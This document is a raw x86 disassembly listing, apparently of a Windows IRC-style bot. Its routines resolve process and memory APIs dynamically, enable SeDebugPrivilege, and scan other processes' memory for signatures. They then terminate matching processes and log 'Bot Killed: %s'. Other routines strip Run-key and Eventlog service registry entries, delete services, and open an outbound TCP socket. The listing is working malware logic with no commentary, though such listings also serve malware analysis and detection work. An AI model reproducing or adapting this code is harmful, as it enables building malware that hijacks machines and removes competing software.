lea eax, [ebp+var_20]
push eax
push esi
mov esi, ds:off_41D014
lea eax, [ebp+var_30]
push eax
push edi
push [ebp+arg_0]
xor ebx, ebx
inc ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], edi
call esi ; sub_449957
mov edi, ds:dword_41D0EC
call edi ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41A091
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_20], ebx
jz short loc_41A0EB
or [ebp+var_14], 2
jmp short loc_41A0EF
; ---------------------------------------------------------------------------
loc_41A0EB: ; CODE XREF: sub_41A06E+75j
and [ebp+var_14], 0FFFFFFFDh
loc_41A0EF: ; CODE XREF: sub_41A06E+7Bj
push eax
push eax
push [ebp+var_8]
lea ecx, [ebp+var_20]
push ecx
push eax
push [ebp+arg_0]
call esi ; sub_449957
call edi ; RtlGetLastWin32Error
neg eax
sbb al, al
inc al
loc_41A106: ; CODE XREF: sub_41A06E+25j
pop edi
pop esi
pop ebx
leave
retn
sub_41A06E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A10B proc near ; CODE XREF: sub_41A6D9+400p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
xor ebx, ebx
push [ebp+arg_C]
mov [ebp+var_8], ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4280D0
test eax, eax
jnz short loc_41A142
loc_41A132: ; CODE XREF: sub_41A10B+70j
; sub_41A10B+74j
push [ebp+arg_C]
call sub_402F67
pop ecx
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A142: ; CODE XREF: sub_41A10B+25j
xor eax, eax
loc_41A144: ; CODE XREF: sub_41A10B+6Cj
and [ebp+var_4], 0
mov edx, offset dword_4270D8
loc_41A14D: ; CODE XREF: sub_41A10B+66j
mov esi, [ebp+arg_C]
mov ecx, [edx+80h]
add esi, eax
mov edi, edx
xor ebx, ebx
repe cmpsb
jz short loc_41A17D
mov ecx, 84h
add [ebp+var_4], ecx
add edx, ecx
cmp [ebp+var_4], 318h
jb short loc_41A14D
inc eax
cmp eax, [ebp+var_8]
jbe short loc_41A144
xor bl, bl
jmp short loc_41A132
; ---------------------------------------------------------------------------
loc_41A17D: ; CODE XREF: sub_41A10B+53j
mov bl, 1
jmp short loc_41A132
sub_41A10B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A181 proc near ; CODE XREF: sub_41A6D9+483p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call dword_4280CC
test eax, eax
jnz short loc_41A1A3
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41A1A3: ; CODE XREF: sub_41A181+1Cj
; sub_41A181+55j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41A1C7
push [ebp+var_14]
push 0
push 1F03FFh
call dword_4280E0
push eax
call ds:off_41D0D0
cmp eax, 0FFFFFFFFh
jz short loc_41A1D8
loc_41A1C7: ; CODE XREF: sub_41A181+28j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call dword_4280F0
test eax, eax
jnz short loc_41A1A3
loc_41A1D8: ; CODE XREF: sub_41A181+44j
push [ebp+arg_4]
call ds:off_41D0D8
mov al, 1
leave
retn
sub_41A181 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1E5 proc near ; CODE XREF: sub_41A6D9+3BDp
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call dword_4280CC
test eax, eax
jnz short loc_41A207
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41A207: ; CODE XREF: sub_41A1E5+1Cj
; sub_41A1E5+55j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41A22B
push [ebp+var_14]
push 0
push 1F03FFh
call dword_4280E0
push eax
call ds:off_41D0D4
cmp eax, 0FFFFFFFFh
jz short loc_41A23C
loc_41A22B: ; CODE XREF: sub_41A1E5+28j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call dword_4280F0
test eax, eax
jnz short loc_41A207
loc_41A23C: ; CODE XREF: sub_41A1E5+44j
push [ebp+arg_4]
call ds:off_41D0D8
mov al, 1
leave
retn
sub_41A1E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A249 proc near ; CODE XREF: sub_41A6D9+3D4p
var_228 = dword ptr -228h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push 8
call dword_4280D4
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41A282
loc_41A272: ; CODE XREF: sub_41A249+53j
xor al, al
loc_41A274: ; CODE XREF: sub_41A249+8Dj
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
; ---------------------------------------------------------------------------
loc_41A282: ; CODE XREF: sub_41A249+27j
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call dword_4280C8
test eax, eax
jz short loc_41A272
loc_41A29E: ; CODE XREF: sub_41A249+6Bj
inc ebx
cmp ebx, 1
jz short loc_41A2BA
lea eax, [ebp+var_228]
push eax
push edi
call dword_4280E4
test eax, eax
jnz short loc_41A29E
xor bl, bl
jmp short loc_41A2CD
; ---------------------------------------------------------------------------
loc_41A2BA: ; CODE XREF: sub_41A249+59j
mov eax, [ebp+var_214]
mov [esi], eax
mov eax, [ebp+var_210]
mov [esi+4], eax
mov bl, 1
loc_41A2CD: ; CODE XREF: sub_41A249+6Fj
push edi
call ds:off_41D0D8
mov al, bl
jmp short loc_41A274
sub_41A249 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1B4h
sub_41A2D8 proc near ; CODE XREF: sub_41A68E+2Dp
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-1B4h]
sub esp, 234h
mov eax, dword_423064
xor eax, ebp
mov [ebp+1B4h+var_4], eax
mov eax, [ebp+1B4h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push 0FFh
mov [ebp+1B4h+var_224], eax
lea eax, [ebp+1B4h+var_103]
push ebx
push eax
mov [ebp+1B4h+var_234], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_230], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_22C], offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_228], offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_104], bl
call sub_407F20
mov esi, 100h
add esp, 0Ch
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
mov [ebp+1B4h+var_20C], offset dword_4270D0
mov [ebp+1B4h+var_220], 2
loc_41A351: ; CODE XREF: sub_41A2D8+160j
mov [ebp+1B4h+var_208], ebx
loc_41A354: ; CODE XREF: sub_41A2D8+153j
mov eax, [ebp+1B4h+var_208]
mov eax, [ebp+eax*4+1B4h+var_234]
lea ecx, [ebp+1B4h+var_210]
push ecx
push 1
push ebx
push eax
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call ds:off_41D02C
test eax, eax
jnz loc_41A41B
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
mov [ebp+1B4h+var_218], ebx
push ebx
jmp short loc_41A407
; ---------------------------------------------------------------------------
loc_41A391: ; CODE XREF: sub_41A2D8+13Dj
xor edi, edi
loc_41A393: ; CODE XREF: sub_41A2D8+10Cj
mov eax, [ebp+1B4h+var_224]
lea edx, [eax+1]
loc_41A399: ; CODE XREF: sub_41A2D8+C6j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41A399
sub eax, edx
push eax
push [ebp+1B4h+var_224]
lea eax, [ebp+edi+1B4h+var_204]
push eax
call sub_402DB5
add esp, 0Ch
test eax, eax
jnz short loc_41A3D2
lea eax, [ebp+1B4h+var_104]
push eax
mov eax, [ebp+1B4h+var_208]
push [ebp+eax*4+1B4h+var_234]
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call sub_417722
add esp, 0Ch
loc_41A3D2: ; CODE XREF: sub_41A2D8+DDj
lea eax, [ebp+1B4h+var_204]
inc edi
lea edx, [eax+1]
loc_41A3D9: ; CODE XREF: sub_41A2D8+106j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41A3D9
sub eax, edx
cmp edi, eax
jbe short loc_41A393
inc [ebp+1B4h+var_218]
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
push [ebp+1B4h+var_218]
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
loc_41A407: ; CODE XREF: sub_41A2D8+B7j
push [ebp+1B4h+var_210]
call ds:off_41D020
cmp eax, 103h
jnz loc_41A391
loc_41A41B: ; CODE XREF: sub_41A2D8+98j
push [ebp+1B4h+var_210]
call ds:off_41D010
inc [ebp+1B4h+var_208]
cmp [ebp+1B4h+var_208], 4
jb loc_41A354
add [ebp+1B4h+var_20C], 4
dec [ebp+1B4h+var_220]
jnz loc_41A351
mov ecx, [ebp+1B4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 1B4h
leave
retn
sub_41A2D8 endp
; =============== S U B R O U T I N E =======================================
sub_41A456 proc near ; CODE XREF: sub_41A4A6+189p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 0F003Fh
push 0
push 0
call ds:off_41D024
push 0F01FFh
push [esp+10h+arg_0]
mov esi, eax
push esi
call ds:off_41D044
mov edi, eax
mov ebx, edi
call sub_419F99
push edi
call ds:off_41D03C
test eax, eax
jz short loc_41A4A2
mov bl, 1
loc_41A490: ; CODE XREF: sub_41A456+4Ej
push esi
mov esi, ds:off_41D040
call esi ; sub_45107E
push edi
call esi ; sub_45107E
pop edi
pop esi
mov al, bl
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41A4A2: ; CODE XREF: sub_41A456+36j
xor bl, bl
jmp short loc_41A490
sub_41A456 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C0h
sub_41A4A6 proc near ; CODE XREF: sub_41A68E+35p
; sub_41A68E:loc_41A6CBp
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_233 = byte ptr -233h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-2C0h]
sub esp, 340h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2C0h+var_4], eax
push esi
mov eax, [ebp+2C0h+arg_0]
push edi
push 0Bh
pop ecx
mov esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
lea edi, [ebp+2C0h+var_34]
rep movsd
movsw
mov esi, 0FFh
push esi
mov [ebp+2C0h+var_340], eax
xor edi, edi
lea eax, [ebp+2C0h+var_233]
push edi
push eax
mov [ebp+2C0h+var_234], 0
call sub_407F20
push esi
lea eax, [ebp+2C0h+var_133]
push edi
push eax
mov [ebp+2C0h+var_134], 0
call sub_407F20
add esp, 18h
lea eax, [ebp+2C0h+var_33C]
push eax
push 0F003Fh
push edi
lea eax, [ebp+2C0h+var_34]
push eax
push 80000002h
call ds:off_41D02C
test eax, eax
jnz loc_41A66E
push ebx
mov ebx, 100h
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push edi
push [ebp+2C0h+var_33C]
mov [ebp+2C0h+var_338], edi
call ds:off_41D018
cmp eax, 103h
jz loc_41A66D
jmp short loc_41A563
; ---------------------------------------------------------------------------
loc_41A55E: ; CODE XREF: sub_41A4A6+1C1j
mov esi, 0FFh
loc_41A563: ; CODE XREF: sub_41A4A6+B6j
push ebx
lea eax, [ebp+2C0h+var_334]
push edi
push eax
call sub_407F20
push ebx
lea eax, [ebp+2C0h+var_234]
push edi
push eax
call sub_407F20
lea eax, [ebp+2C0h+var_134]
push eax
lea eax, [ebp+2C0h+var_34]
push eax
push offset aSS_5 ; "%s\\%s"
lea eax, [ebp+2C0h+var_234]
push esi
push eax
call sub_402EBA
lea eax, [ebp+2C0h+var_234]
add esp, 2Ch
lea esi, [eax+1]
loc_41A5A8: ; CODE XREF: sub_41A4A6+107j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A5A8
sub eax, esi
mov [ebp+eax+2C0h+var_234], cl
lea eax, [ebp+2C0h+var_134]
push offset aLdm ; "LDM"
push eax
call sub_402C75
test eax, eax
pop ecx
pop ecx
jz short loc_41A64B
push 7
mov edi, offset aNetdde ; "NetDDE"
lea esi, [ebp+2C0h+var_134]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_41A649
push ebx
lea eax, [ebp+2C0h+var_334]
push eax
push offset aEventmessagefi ; "EventMessageFile"
lea eax, [ebp+2C0h+var_234]
push eax
push 1
call sub_4176BD
add esp, 14h
test al, al
jz short loc_41A649
xor esi, esi
loc_41A604: ; CODE XREF: sub_41A4A6+1A1j
mov eax, [ebp+2C0h+var_340]
lea edx, [eax+1]
loc_41A60A: ; CODE XREF: sub_41A4A6+169j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A60A
sub eax, edx
push eax
push [ebp+2C0h+var_340]
lea eax, [ebp+esi+2C0h+var_334]
push eax
call sub_402DB5
add esp, 0Ch
test eax, eax
jnz short loc_41A635
lea eax, [ebp+2C0h+var_134]
push eax
call sub_41A456
pop ecx
loc_41A635: ; CODE XREF: sub_41A4A6+180j
lea eax, [ebp+2C0h+var_334]
inc esi
lea edx, [eax+1]
loc_41A63C: ; CODE XREF: sub_41A4A6+19Bj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A63C
sub eax, edx
cmp esi, eax
jbe short loc_41A604
loc_41A649: ; CODE XREF: sub_41A4A6+13Bj
; sub_41A4A6+15Aj
xor edi, edi
loc_41A64B: ; CODE XREF: sub_41A4A6+127j
inc [ebp+2C0h+var_338]
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push [ebp+2C0h+var_338]
push [ebp+2C0h+var_33C]
call ds:off_41D018
cmp eax, 103h
jnz loc_41A55E
loc_41A66D: ; CODE XREF: sub_41A4A6+B0j
pop ebx
loc_41A66E: ; CODE XREF: sub_41A4A6+8Aj
push [ebp+2C0h+var_33C]
call ds:off_41D010
mov ecx, [ebp+2C0h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402ADC
add ebp, 2C0h
leave
retn
sub_41A4A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A68E proc near ; CODE XREF: sub_41A6D9+42Ap
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:off_41D0F4
test eax, eax
jz short loc_41A6D5
push 7D0h
call ds:off_41D0F8
push [ebp+arg_4]
call ds:off_41D0CC
test eax, eax
push [ebp+arg_8]
jz short loc_41A6CB
call sub_41A2D8
push [ebp+arg_8]
call sub_41A4A6
pop ecx
jmp short loc_41A6D0
; ---------------------------------------------------------------------------
loc_41A6CB: ; CODE XREF: sub_41A68E+2Bj
call sub_41A4A6
loc_41A6D0: ; CODE XREF: sub_41A68E+3Bj
pop ecx
mov al, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A6D5: ; CODE XREF: sub_41A68E+10j
xor al, al
pop ebp
retn
sub_41A68E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6D9 proc near ; DATA XREF: sub_41C2E2+36Fo
var_569 = byte ptr -569h
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = dword ptr -55Ch
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_540 = dword ptr -540h
var_524 = byte ptr -524h
var_420 = byte ptr -420h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
var_210 = byte ptr -210h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 56Ch
mov eax, dword_423064
xor eax, esp
mov [esp+56Ch+var_4], eax
push ebx
push esi
push edi
xor ebx, ebx
push 103h
lea eax, [esp+57Ch+var_317]
push ebx
push eax
mov [esp+584h+var_318], bl
call sub_407F20
add esp, 0Ch
mov [esp+578h+var_558], offset dword_420824
mov [esp+578h+var_554], offset dword_420834
mov [esp+578h+var_550], offset dword_420840
call sub_402EB4 ; GetCurrentProcessId
mov edi, ds:dword_41D0E0
push offset aOpenthread ; "OpenThread"
push offset aKernel32_dll_0 ; "kernel32.dll"
mov [esp+580h+var_54C], eax
call edi ; GetModuleHandleA
mov esi, ds:off_41D0E8
push eax
call esi ; sub_446320
push offset aOpenprocess ; "OpenProcess"
push offset aKernel32_dll_1 ; "kernel32.dll"
mov dword_4280E0, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push offset aKernel32_dll_2 ; "kernel32.dll"
mov dword_4280EC, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aProcess32first ; "Process32First"
push offset aKernel32_dll_3 ; "kernel32.dll"
mov dword_4280D4, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aProcess32next ; "Process32Next"
push offset aKernel32_dll_4 ; "kernel32.dll"
mov dword_4280D8, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aModule32first ; "Module32First"
push offset aKernel32_dll_5 ; "kernel32.dll"
mov dword_4280DC, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aModule32next ; "Module32Next"
push offset aKernel32_dll_6 ; "kernel32.dll"
mov dword_4280C8, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aThread32first ; "Thread32First"
push offset aKernel32_dll_7 ; "kernel32.dll"
mov dword_4280E4, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aThread32next ; "Thread32Next"
push offset aKernel32_dll_8 ; "kernel32.dll"
mov dword_4280CC, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aReadprocessmem ; "ReadProcessMemory"
push offset aKernel32_dll_9 ; "kernel32.dll"
mov dword_4280F0, eax
call edi ; GetModuleHandleA
push eax
call esi ; sub_446320
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push offset aPsapi_dll ; "psapi.dll"
mov dword_4280D0, eax
call ds:off_41D0E4
push eax
call esi ; sub_446320
cmp dword_4280E0, ebx
mov dword_4280E8, eax
jz loc_41ABA4
cmp dword_4280EC, ebx
jz loc_41ABA4
cmp dword_4280D4, ebx
jz loc_41ABA4
cmp dword_4280D8, ebx
jz loc_41ABA4
cmp dword_4280DC, ebx
jz loc_41ABA4
cmp dword_4280C8, ebx
jz loc_41ABA4
cmp dword_4280E4, ebx
jz loc_41ABA4
cmp dword_4280CC, ebx
jz loc_41ABA4
cmp dword_4280F0, ebx
jz loc_41ABA4
cmp dword_4280D0, ebx
jz loc_41ABA4
cmp eax, ebx
jz loc_41ABA4
mov edi, 104h
push edi
lea eax, [esp+57Ch+var_318]
push eax
call ds:dword_41D0F0 ; GetSystemDirectoryA
lea eax, [esp+578h+var_558]
xor esi, esi
mov [esp+578h+var_568], eax
loc_41A8C0: ; CODE XREF: sub_41A6D9+238j
mov ecx, [esp+578h+var_568]
push dword ptr [ecx]
lea ecx, [esp+57Ch+var_318]
push ecx
push offset aSS_2 ; "%s\\%s"
lea eax, [esp+esi+584h+var_210]
push 103h
push eax
call sub_402EBA
lea eax, [esp+esi+58Ch+var_210]
add esp, 14h
lea ecx, [eax+1]
loc_41A8F2: ; CODE XREF: sub_41A6D9+21Ej
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41A8F2
add [esp+578h+var_568], 4
sub eax, ecx
add eax, esi
add esi, edi
cmp esi, 30Ch
mov [esp+eax+578h+var_210], bl
jb short loc_41A8C0
loc_41A913: ; CODE XREF: sub_41A6D9+4C6j
push ebx
push 0Fh
mov [esp+580h+var_548], 128h
call dword_4280D4
lea ecx, [esp+578h+var_548]
push ecx
push eax
mov [esp+580h+var_55C], eax
call dword_4280D8
test eax, eax
jz loc_41AB94
jmp loc_41AB7D
; ---------------------------------------------------------------------------
loc_41A941: ; CODE XREF: sub_41A6D9+4B5j
mov edi, ds:off_41D100
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
mov [esp+584h+var_569], 1
call edi ; sub_442AD1
mov esi, ds:off_41D038
push eax
call esi ; sub_44697F
test eax, eax
jnz short loc_41A995
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 3F0h
jnz short loc_41A991
push 2
call ds:off_41D030
test eax, eax
jnz short loc_41A980
mov [esp+578h+var_569], bl
loc_41A980: ; CODE XREF: sub_41A6D9+2A1j
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
call edi ; sub_442AD1
push eax
call esi ; sub_44697F
test eax, eax
jnz short loc_41A995
loc_41A991: ; CODE XREF: sub_41A6D9+295j
mov [esp+578h+var_569], bl
loc_41A995: ; CODE XREF: sub_41A6D9+288j
; sub_41A6D9+2B6j
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_41A06E
add esp, 0Ch
test al, al
jnz short loc_41A9BA
push [esp+578h+var_564]
call ds:off_41D0D8
mov [esp+578h+var_569], bl
loc_41A9BA: ; CODE XREF: sub_41A6D9+2D1j
push [esp+578h+var_540]
push ebx
push 1F0FFFh
call dword_4280EC
cmp eax, ebx
mov [esp+578h+var_568], eax
jnz short loc_41A9D6
mov [esp+578h+var_569], bl
loc_41A9D6: ; CODE XREF: sub_41A6D9+2F7j
mov esi, 104h
push esi
lea eax, [esp+57Ch+var_420]
push ebx
push eax
call sub_407F20
add esp, 0Ch
push esi
lea eax, [esp+57Ch+var_420]
push eax
push ebx
push [esp+584h+var_568]
call dword_4280E8
mov [esp+578h+var_560], ebx
lea edi, [esp+578h+var_210]
loc_41AA0C: ; CODE XREF: sub_41A6D9+352j
lea eax, [esp+578h+var_420]
push eax
push edi
call sub_402C75
test eax, eax
pop ecx
pop ecx
jz short loc_41AA2F
inc [esp+578h+var_560]
add edi, esi
cmp [esp+578h+var_560], 3
jb short loc_41AA0C
jmp short loc_41AA33
; ---------------------------------------------------------------------------
loc_41AA2F: ; CODE XREF: sub_41A6D9+345j
mov [esp+578h+var_569], bl
loc_41AA33: ; CODE XREF: sub_41A6D9+354j
cmp [esp+578h+var_569], bl
jz loc_41AB63
push ebx
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_41A06E
xor eax, eax
lea edi, [esp+584h+var_558]
stosd
stosd
mov eax, [esp+584h+var_54C]
add esp, 0Ch
cmp [esp+578h+var_540], eax
jz loc_41AB63
lea eax, [esp+578h+var_524]
push offset aSystem ; "System"
push eax
call sub_402C75
test eax, eax
pop ecx
pop ecx
jz loc_41AB63
mov esi, [esp+578h+var_540]
push ebx
push 4
call dword_4280D4
cmp eax, 0FFFFFFFFh
jz loc_41AB63
push eax
push esi
call sub_41A1E5
cmp al, bl
pop ecx
pop ecx
jz loc_41AB63
push [esp+578h+var_540]
lea esi, [esp+57Ch+var_558]
call sub_41A249
test al, al
pop ecx
jz loc_41AB48
push [esp+578h+var_554]
call sub_402A14
cmp eax, ebx
pop ecx
jnz short loc_41AACC
push ebx
jmp short loc_41AB42
; ---------------------------------------------------------------------------
loc_41AACC: ; CODE XREF: sub_41A6D9+3EEj
push eax
push [esp+57Ch+var_554]
push [esp+580h+var_558]
push [esp+584h+var_568]
call sub_41A10B
add esp, 10h
cmp al, bl
jz short loc_41AB48
push 100h
call sub_402A14
pop ecx
mov esi, eax
lea eax, [esp+578h+var_524]
push eax
lea eax, [esp+57Ch+var_420]
push eax
push [esp+580h+var_568]
call sub_41A68E
add esp, 0Ch
test al, al
jz short loc_41AB41
push esi
call sub_402E11
pop ecx
push eax
mov ebx, offset aTtzf ; "â⇔"
call sub_419F0A
pop ecx
lea eax, [esp+578h+var_420]
push eax
push offset aBotKilledS ; "Bot Killed: %s"
push esi
push 0
push offset dword_42851C
call sub_417B51
add esp, 14h
xor ebx, ebx
loc_41AB41: ; CODE XREF: sub_41A6D9+434j
push esi
loc_41AB42: ; CODE XREF: sub_41A6D9+3F1j
call sub_402F67
pop ecx
loc_41AB48: ; CODE XREF: sub_41A6D9+3DCj
; sub_41A6D9+40Aj
mov esi, [esp+578h+var_540]
push ebx
push 4
call dword_4280D4
cmp eax, 0FFFFFFFFh
jz short loc_41AB63
push eax
push esi
call sub_41A181
pop ecx
pop ecx
loc_41AB63: ; CODE XREF: sub_41A6D9+35Ej
; sub_41A6D9+386j ...
push [esp+578h+var_564]
mov esi, ds:off_41D0D8
call esi ; sub_4588BA
push [esp+578h+var_568]
call esi ; sub_4588BA
push 1
call ds:off_41D0F8
loc_41AB7D: ; CODE XREF: sub_41A6D9+263j
lea eax, [esp+578h+var_548]
push eax
push [esp+57Ch+var_55C]
call dword_4280DC
test eax, eax
jnz loc_41A941
loc_41AB94: ; CODE XREF: sub_41A6D9+25Dj
push 927C0h
call ds:off_41D0F8
jmp loc_41A913
; ---------------------------------------------------------------------------
loc_41ABA4: ; CODE XREF: sub_41A6D9+14Fj
; sub_41A6D9+15Bj ...
call ds:dword_41D0DC ; GetCurrentThreadId
push eax
call sub_41481E
pop ecx
mov ecx, [esp+578h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402ADC
mov esp, ebp
pop ebp
retn 4
sub_41A6D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABCA proc near ; CODE XREF: sub_41AD0F+98p
var_5B4 = word ptr -5B4h
var_5B2 = word ptr -5B2h
var_5B0 = dword ptr -5B0h
var_5A4 = byte ptr -5A4h
var_5A3 = byte ptr -5A3h
var_1A4 = byte ptr -1A4h
var_1A3 = byte ptr -1A3h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5B4h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
xor ebx, ebx
push 3FFh
lea eax, [ebp+var_5A3]
push ebx
push eax
mov [ebp+var_5A4], bl
call sub_407F20
push 18Fh
lea eax, [ebp+var_1A3]
push ebx
push eax
mov [ebp+var_1A4], bl
call sub_407F20
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
stosb
xor eax, eax
lea edi, [ebp+var_5B4]
stosd
stosd
stosd
stosd
mov eax, [ebp+arg_0]
add esp, 18h
push 216Bh
mov [ebp+var_5B4], 2
mov [ebp+var_5B0], eax
call ds:dword_41D270 ; htons
push ebx
push 1
push 2
mov [ebp+var_5B2], ax
call ds:dword_41D220 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41AC7B
push eax
loc_41AC65: ; CODE XREF: sub_41ABCA+C7j
call ds:dword_41D280 ; closesocket
xor al, al
loc_41AC6D: ; CODE XREF: sub_41ABCA+13Cj
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
; ---------------------------------------------------------------------------
loc_41AC7B: ; CODE XREF: sub_41ABCA+98j
push 10h
lea eax, [ebp+var_5B4]
push eax
push edi
call ds:dword_41D23C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41AC93
push edi
jmp short loc_41AC65
; ---------------------------------------------------------------------------
loc_41AC93: ; CODE XREF: sub_41ABCA+C4j
push esi
